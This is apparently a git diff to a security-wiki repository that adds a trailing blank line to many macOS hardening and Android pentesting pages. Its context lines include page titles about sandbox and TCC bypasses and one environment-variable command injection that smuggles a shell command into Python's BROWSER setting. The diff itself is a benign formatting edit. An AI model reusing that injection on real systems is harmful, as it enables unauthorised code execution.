b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md @@ -404,3 +404,4 @@ The code generated by MIG also calles `kernel_debug` to generate logs about oper {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md index 9f6a80b62..e7b1552eb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md @@ -177,3 +177,4 @@ By adhering to these guidelines and utilizing the `threadexec` library, one can {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md index eac7481ad..a20a23073 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md @@ -486,3 +486,4 @@ It's possible to find thee communications using `netstat`, `nettop` or the open {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md index 3e645ea6e..a91d747b4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md @@ -442,3 +442,4 @@ int main(void) { {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md index fd4eaef8b..2279ec6cb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md @@ -95,3 +95,4 @@ if ((csFlags & (cs_hard | cs_require_lv)) { {{#include ../../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md index 18b978a43..971b7448e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md @@ -292,3 +292,4 @@ int main(int argc, const char * argv[]) { {{#include ../../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md index ed3c96237..968740441 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md @@ -125,3 +125,4 @@ Below is a visual representation of the described attack scenario: {{#include ../../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md index 3a49edb2f..3b0cd8bd4 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md @@ -174,3 +174,4 @@ Note how interesting is that Android Studio in this example is trying to load th {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md index f6b2801c9..992af9109 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md @@ -339,3 +339,4 @@ DYLD_INSERT_LIBRARIES=inject.dylib ./hello-signed # Won't work {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md index 2eace525a..d2964d3f5 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -166,3 +166,4 @@ sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib" {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md index 5fc6a3ad9..955253c76 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.md @@ -316,3 +316,4 @@ find . -type f | xargs grep strcmp| grep key,\ \" | cut -d'"' -f2 | sort -u {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md index c08fb19e8..82338aa1e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md @@ -72,3 +72,4 @@ For example, if a script is importing **`use File::Basename;`** it would be poss {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md index 6f40d560e..24e393856 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.md @@ -20,3 +20,4 @@ BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md index 09236a052..acac3c28f 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md @@ -33,3 +33,4 @@ RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md index df5a809a8..96f888304 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md @@ -145,3 +145,4 @@ References and **more information about BTM**: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md index 984e79a64..a6adaa2b9 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-amfi-applemobilefileintegrity.md @@ -131,3 +131,4 @@ iOS AMFI maintains a lost of known hashes which are signed ad-hoc, called the ** {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md index c48c62ea8..5797c9c85 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.md @@ -88,3 +88,4 @@ That will fork and exec `/usr/libexec/security_authtrampoline /bin/ls` as root, {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md index f9b0d948e..bb050f707 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-code-signing.md @@ -370,3 +370,4 @@ struct cs_blob { {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index a0e2a2529..c41fd2993 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -171,3 +171,4 @@ Allow the process to **ask for all the TCC permissions**. + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md index 6de0e5c0f..e037af877 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/README.md @@ -469,3 +469,4 @@ This feature is particularly useful for preventing certain classes of security v {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md index b16e59911..1f01dd1e6 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-fs-tricks/macos-xattr-acls-extra-stuff.md @@ -182,3 +182,4 @@ xattr -l protected {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md index 9ce8be51f..e9e29b796 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md @@ -476,3 +476,4 @@ In an ".app" bundle if the quarantine xattr is not added to it, when executing i {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md index a5c2c1351..fe417ba0e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.md @@ -178,3 +178,4 @@ Even if it's required that the application has to be **opened by LaunchService** {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md index fa4bbbbb8..2124c1639 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-macf-mandatory-access-control-framework.md @@ -253,3 +253,4 @@ __END_DECLS {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md index 79897f40a..ba7e843fc 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/README.md @@ -401,3 +401,4 @@ Sandbox also has a user daemon running exposing the XPC Mach service `com.apple. {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md index 01de795a5..9efff6470 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.md @@ -115,3 +115,4 @@ codesign --remove-signature SandboxedShellApp.app {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md index 51df66ce3..431cc6ffb 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md @@ -501,3 +501,4 @@ Process 2517 exited with status = 0 (0x00000000) {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md index 2a0d99993..b2f0de94e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.md @@ -52,3 +52,4 @@ The thing is that even if **`python`** was signed by Apple, it **won't execute** {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md index 2993f64e6..88331bd86 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md @@ -281,3 +281,4 @@ mount {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md index 858fcb764..ebea24ebd 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/README.md @@ -604,3 +604,4 @@ macos-tcc-bypasses/ {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md index ab64a70d7..20660737e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.md @@ -22,3 +22,4 @@ Sandboxed applications requires privileges like `allow appleevent-send` and `(al {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md index 2729a908a..ac90516c3 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/README.md @@ -538,3 +538,4 @@ Another way using [**CoreGraphics events**](https://objectivebythesea.org/v2/tal {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md index ef80f65fd..6b96ba343 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md @@ -34,3 +34,4 @@ However, there are still some tools that can be used to understand this kind of {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md index 0759672ab..c425f520a 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md @@ -930,3 +930,4 @@ int main() { {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/misc/references.md b/src/misc/references.md index 554fdab52..7b4e414f8 100644 --- a/src/misc/references.md +++ b/src/misc/references.md @@ -49,3 +49,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/README.md b/src/mobile-pentesting/android-app-pentesting/README.md index c5e8a0a8d..ebe647a79 100644 --- a/src/mobile-pentesting/android-app-pentesting/README.md +++ b/src/mobile-pentesting/android-app-pentesting/README.md @@ -777,3 +777,4 @@ AndroL4b is an Android security virtual machine based on ubuntu-mate includes th {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/adb-commands.md b/src/mobile-pentesting/android-app-pentesting/adb-commands.md index 0f5b642fc..0b797b0c2 100644 --- a/src/mobile-pentesting/android-app-pentesting/adb-commands.md +++ b/src/mobile-pentesting/android-app-pentesting/adb-commands.md @@ -354,3 +354,4 @@ If you want to inspect the content of the backup: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md index 13a5ccdfe..42c34af7f 100644 --- a/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md +++ b/src/mobile-pentesting/android-app-pentesting/android-applications-basics.md @@ -398,3 +398,4 @@ if (dpm.isAdminActive(adminComponent)) { {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md index ce6c2fdff..f8f07c062 100644 --- a/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md +++ b/src/mobile-pentesting/android-app-pentesting/android-task-hijacking.md @@ -47,3 +47,4 @@ To prevent such attacks, developers can set `taskAffinity` to an empty string an {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md index bbb22c67e..a8297f7ed 100644 --- a/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md +++ b/src/mobile-pentesting/android-app-pentesting/apk-decompilers.md @@ -62,3 +62,4 @@ This tool can be used to dump the DEX of a running APK in memory. This helps to {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md index fff2a263f..b265cc693 100644 --- a/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md +++ b/src/mobile-pentesting/android-app-pentesting/avd-android-virtual-device.md @@ -230,3 +230,4 @@ You can **use the GUI** to take a snapshot of the VM at any time: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md index fe8a5153a..97ec547f9 100644 --- a/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md +++ b/src/mobile-pentesting/android-app-pentesting/bypass-biometric-authentication-android.md @@ -78,3 +78,4 @@ There are specialized tools and scripts designed to test and bypass authenticati {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/content-protocol.md b/src/mobile-pentesting/android-app-pentesting/content-protocol.md index 896de67f0..2932c02db 100644 --- a/src/mobile-pentesting/android-app-pentesting/content-protocol.md +++ b/src/mobile-pentesting/android-app-pentesting/content-protocol.md @@ -92,3 +92,4 @@ Proof-of-Concept HTML: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md index 26645f424..6a7070c34 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md @@ -299,3 +299,4 @@ run app.package.debuggable {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index d5c747d52..e536d791e 100644 --- a/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -202,3 +202,4 @@ Vulnerable Providers: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index b751a9065..d080e52f1 100644 --- a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -91,3 +91,4 @@ This example demonstrated how the behavior of a debuggable application can be ma {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md index 0bd758a23..533715b89 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -205,3 +205,4 @@ Java.choose("com.example.a11x256.frida_test.my_activity", { {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md index 731cee432..78971dcec 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-1.md @@ -137,3 +137,4 @@ You can see that in [the next tutorial](frida-tutorial-2.md). {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md index 46514f83a..395826357 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/frida-tutorial-2.md @@ -221,3 +221,4 @@ There is a part 5 that I am not going to explain because there isn't anything ne {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md index 198f670e2..32d3f5455 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md @@ -280,3 +280,4 @@ exit {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md index f1cc46bfa..4670987ee 100644 --- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md +++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md @@ -123,3 +123,4 @@ Java.perform(function () { {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md index 2a2381a2f..8108d8ad3 100644 --- a/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md +++ b/src/mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md @@ -69,3 +69,4 @@ You need to do this inside a physical device as (I don't know why) this doesn't {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md index b110bd690..eecd8c9f5 100644 --- a/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/install-burp-certificate.md @@ -154,3 +154,4 @@ nsenter --mount=/proc/$APP_PID/ns/mnt -- /bin/mount --bind /system/etc/security/ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/intent-injection.md b/src/mobile-pentesting/android-app-pentesting/intent-injection.md index f1baf8659..10ab891d9 100644 --- a/src/mobile-pentesting/android-app-pentesting/intent-injection.md +++ b/src/mobile-pentesting/android-app-pentesting/intent-injection.md @@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md index 79322251e..f23c9b8ec 100644 --- 